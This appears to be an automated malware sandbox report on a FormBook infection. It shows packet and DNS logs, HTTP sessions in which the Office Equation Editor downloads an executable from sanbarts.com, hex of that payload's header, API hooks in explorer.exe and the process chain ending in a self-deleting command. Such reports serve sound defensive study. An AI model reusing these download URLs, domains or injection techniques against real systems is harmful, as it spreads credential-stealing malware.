                                                      May 27, 2022 21:20:08.721163034 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721175909 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721191883 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721209049 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721225023 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721242905 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721287966 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.721925974 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.721942902 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.721947908 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.777307034 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.777344942 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.777530909 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005276918 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005310059 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005328894 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005347967 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005359888 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005378962 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005394936 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005413055 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005430937 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005448103 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005453110 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005466938 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005481005 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005486012 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005486012 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005492926 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005511045 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005525112 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.009583950 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064732075 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064769983 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064791918 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064814091 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064835072 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064857006 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064871073 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064878941 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064901114 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064901114 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064904928 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064908028 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064915895 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064925909 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064939022 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064949036 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064964056 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.065027952 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.065567970 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.104387999 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104424953 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104441881 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104460955 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104504108 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104521036 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104536057 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104552984 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104576111 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104594946 CEST804917445.120.185.113192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 27, 2022 21:20:07.500580072 CEST5586853192.168.2.228.8.8.8
                                                      May 27, 2022 21:20:07.519690990 CEST53558688.8.8.8192.168.2.22
                                                      May 27, 2022 21:20:07.697839022 CEST4968853192.168.2.228.8.8.8
                                                      May 27, 2022 21:20:07.747270107 CEST53496888.8.8.8192.168.2.22
                                                      May 27, 2022 21:21:30.526065111 CEST5883653192.168.2.228.8.8.8
                                                      May 27, 2022 21:21:30.566380978 CEST53588368.8.8.8192.168.2.22
                                                      May 27, 2022 21:21:48.877341032 CEST5013453192.168.2.228.8.8.8
                                                      May 27, 2022 21:21:49.139980078 CEST53501348.8.8.8192.168.2.22
                                                      May 27, 2022 21:22:09.726602077 CEST5527553192.168.2.228.8.8.8
                                                      May 27, 2022 21:22:09.749313116 CEST53552758.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 27, 2022 21:20:07.500580072 CEST192.168.2.228.8.8.80xcd9Standard query (0)sanbarts.comA (IP address)IN (0x0001)
                                                      May 27, 2022 21:20:07.697839022 CEST192.168.2.228.8.8.80xf72Standard query (0)www.sanbarts.comA (IP address)IN (0x0001)
                                                      May 27, 2022 21:21:30.526065111 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.storyofsol.comA (IP address)IN (0x0001)
                                                      May 27, 2022 21:21:48.877341032 CEST192.168.2.228.8.8.80x1666Standard query (0)www.createacarepack.comA (IP address)IN (0x0001)
                                                      May 27, 2022 21:22:09.726602077 CEST192.168.2.228.8.8.80x723cStandard query (0)www.paypal-caseid521.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 27, 2022 21:20:07.519690990 CEST8.8.8.8192.168.2.220xcd9No error (0)sanbarts.com194.9.94.86A (IP address)IN (0x0001)
                                                      May 27, 2022 21:20:07.519690990 CEST8.8.8.8192.168.2.220xcd9No error (0)sanbarts.com194.9.94.85A (IP address)IN (0x0001)
                                                      May 27, 2022 21:20:07.747270107 CEST8.8.8.8192.168.2.220xf72No error (0)www.sanbarts.com215ffbc1941f6023.7host.cnCNAME (Canonical name)IN (0x0001)
                                                      May 27, 2022 21:20:07.747270107 CEST8.8.8.8192.168.2.220xf72No error (0)215ffbc1941f6023.7host.cn45.120.185.113A (IP address)IN (0x0001)
                                                      May 27, 2022 21:21:30.566380978 CEST8.8.8.8192.168.2.220xc4a9Name error (3)www.storyofsol.comnonenoneA (IP address)IN (0x0001)
                                                      May 27, 2022 21:21:49.139980078 CEST8.8.8.8192.168.2.220x1666No error (0)www.createacarepack.comsbsfe-p8.geo.mf0.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                                      May 27, 2022 21:21:49.139980078 CEST8.8.8.8192.168.2.220x1666No error (0)sbsfe-p8.geo.mf0.yahoodns.net98.137.244.37A (IP address)IN (0x0001)
                                                      May 27, 2022 21:22:09.749313116 CEST8.8.8.8192.168.2.220x723cName error (3)www.paypal-caseid521.comnonenoneA (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • sanbarts.com
                                                      • www.sanbarts.com
                                                      • www.createacarepack.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249173194.9.94.8680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampkBytes transferredDirectionData
                                                      May 27, 2022 21:20:07.586997986 CEST2OUTGET /cssati.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: sanbarts.com
                                                      Connection: Keep-Alive
                                                      May 27, 2022 21:20:07.626665115 CEST2INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx
                                                      Date: Fri, 27 May 2022 19:20:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: keep-alive
                                                      Location: http://www.sanbarts.com/cssati.exe
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.224917445.120.185.11380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampkBytes transferredDirectionData
                                                      May 27, 2022 21:20:08.064167976 CEST3OUTGET /cssati.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Connection: Keep-Alive
                                                      Host: www.sanbarts.com
                                                      May 27, 2022 21:20:08.378580093 CEST4INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Last-Modified: Thu, 26 May 2022 00:40:19 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "4042e42c9970d81:0"
                                                      Server: Microsoft-IIS/10.0
                                                      X-Powered-By: ASP.NET
                                                      Date: Fri, 27 May 2022 19:20:07 GMT
                                                      Content-Length: 299113
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 71 4a a8 a1 10 24 fb a1 10 24 fb a1 10 24 fb 2f 18 7b fb a3 10 24 fb a1 10 25 fb 3b 10 24 fb 22 18 79 fb b0 10 24 fb f5 33 14 fb a8 10 24 fb 66 16 22 fb a0 10 24 fb 52 69 63 68 a1 10 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b6 ce 69 46 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 fa 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qJ$$$/{$%;$"y$3$f"$Rich$PELiFZ2p@sp.textYZ `.rdatazp^@@.datap@.ndata@.rsrct@@


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.224917598.137.244.3780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 27, 2022 21:21:49.331468105 CEST318OUTGET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
                                                      Host: www.createacarepack.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 27, 2022 21:21:49.504925966 CEST318INHTTP/1.1 404 Not Found
                                                      Date: Fri, 27 May 2022 19:21:49 GMT
                                                      P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                      Vary: Accept-Encoding
                                                      Content-Length: 73
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Age: 0
                                                      Connection: close
                                                      Server: ATS
                                                      Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64
                                                      Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      PeekMessageAINLINEexplorer.exe
                                                      PeekMessageWINLINEexplorer.exe
                                                      GetMessageWINLINEexplorer.exe
                                                      GetMessageAINLINEexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: USER32.dll
                                                      Function NameHook TypeNew Data
                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:21:20:14
                                                      Start date:27/05/2022
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13f5b0000
                                                      File size:1423704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:2
                                                      Start time:21:20:17
                                                      Start date:27/05/2022
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:4
                                                      Start time:21:20:21
                                                      Start date:27/05/2022
                                                      Path:C:\Users\user\AppData\Roaming\word.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                      Imagebase:0x400000
                                                      File size:299113 bytes
                                                      MD5 hash:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 9%, Metadefender, Browse
                                                      • Detection: 62%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:5
                                                      Start time:21:20:23
                                                      Start date:27/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                      Imagebase:0x9a0000
                                                      File size:191488 bytes
                                                      MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 69%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:6
                                                      Start time:21:20:24
                                                      Start date:27/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                      Imagebase:0x9a0000
                                                      File size:191488 bytes
                                                      MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Target ID:7
                                                      Start time:21:20:30
                                                      Start date:27/05/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xff040000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Target ID:8
                                                      Start time:21:20:52
                                                      Start date:27/05/2022
                                                      Path:C:\Windows\SysWOW64\wuapp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\wuapp.exe
                                                      Imagebase:0xb30000
                                                      File size:35328 bytes
                                                      MD5 hash:C8EBA45CEF271BED6C2F0E1965D229EA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Target ID:9
                                                      Start time:21:20:57
                                                      Start date:27/05/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
                                                      Imagebase:0x4a830000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      No disassembly